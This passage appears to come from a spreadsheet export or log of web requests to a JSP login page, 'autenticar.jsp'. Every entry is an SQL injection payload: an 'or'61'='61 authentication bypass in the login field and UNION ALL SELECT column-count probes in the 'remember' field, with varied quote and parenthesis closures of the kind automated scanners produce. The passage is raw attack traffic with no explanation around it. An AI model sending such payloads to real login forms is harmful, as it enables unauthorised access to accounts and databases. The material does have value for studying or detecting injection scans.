    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558,9558#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125,5125#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886,886#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852,2852#and(113=113&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352,3352#and(5573=5573&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839,7839#and(5675=5675&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774,3774#and(3143=3143&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275,2275#and(3251=3251&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990,2990#and(8234=8234&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549#and(8589=8589&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676,7676#and(4842=4842&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682#and(7434=7434&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241#and(6110=6110&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815,3815#and((7105=7105&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298#and((6999=6999&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812#and((5970=5970&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976,7976#and((6223=6223&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346#and((8515=8515&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436,4436#and((4657=4657&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152,4152#and((2817=2817&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503,3503#and((7367=7367&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679,6679#and((4863=4863&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315,1315#and((3914=3914&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841,4841#and(((6745=6745&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709#and(((7677=7677&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670,3670#and(((1062=1062&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276,8276#and(((130=130&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396,7396#and(((8233=8233&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300,8300#and(((3059=3059&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421,7421#and(((60=60&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912,912#and(((9466=9466&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358,5358#and(((996=996&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610,4610#and(((3480=3480&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173,6173#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604,3604#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484,484#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628,3628#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054,6054#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192,8192#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991,1991#and('eoae'='eoae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584,584#and('evos'='evos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859,1859#and('gcda'='gcda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308,5308#and('gsko'='gsko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419#and('ffmw'='ffmw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643,1643#and('sufu'='sufu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096,2096#and('oxpr'='oxpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202,3202#and('mjma'='mjma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688,9688#and('umqt'='umqt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512,8512#and('yslh'='yslh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525,8525#and(('bysb'='bysb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567,5567#and(('bavo'='bavo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063,4063#and(('bbwn'='bbwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999,8999#and(('ldow'='ldow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997#and(('aahz'='aahz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184,1184#and(('ihmy'='ihmy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672,1672#and(('jfnc'='jfnc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709#and(('ldhy'='ldhy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663#and(('gxoc'='gxoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206,3206#and(('zbkr'='zbkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561,2561#and((('ramg'='ramg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582,3582#and((('igoy'='igoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335,6335#and((('btlh'='btlh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212,9212#and((('vmfi'='vmfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862,5862#and((('rvzn'='rvzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244,5244#and((('wbuf'='wbuf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608,6608#and((('lsry'='lsry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090,3090#and((('meuk'='meuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618,9618#and((('tovf'='tovf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263#and((('bopr'='bopr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180,2180#and'qkrg'='qkrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501,8501#and'bsvk'='bsvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517,8517#and'locx'='locx&amp;modo=entrar</t>
  </si>
  <si>
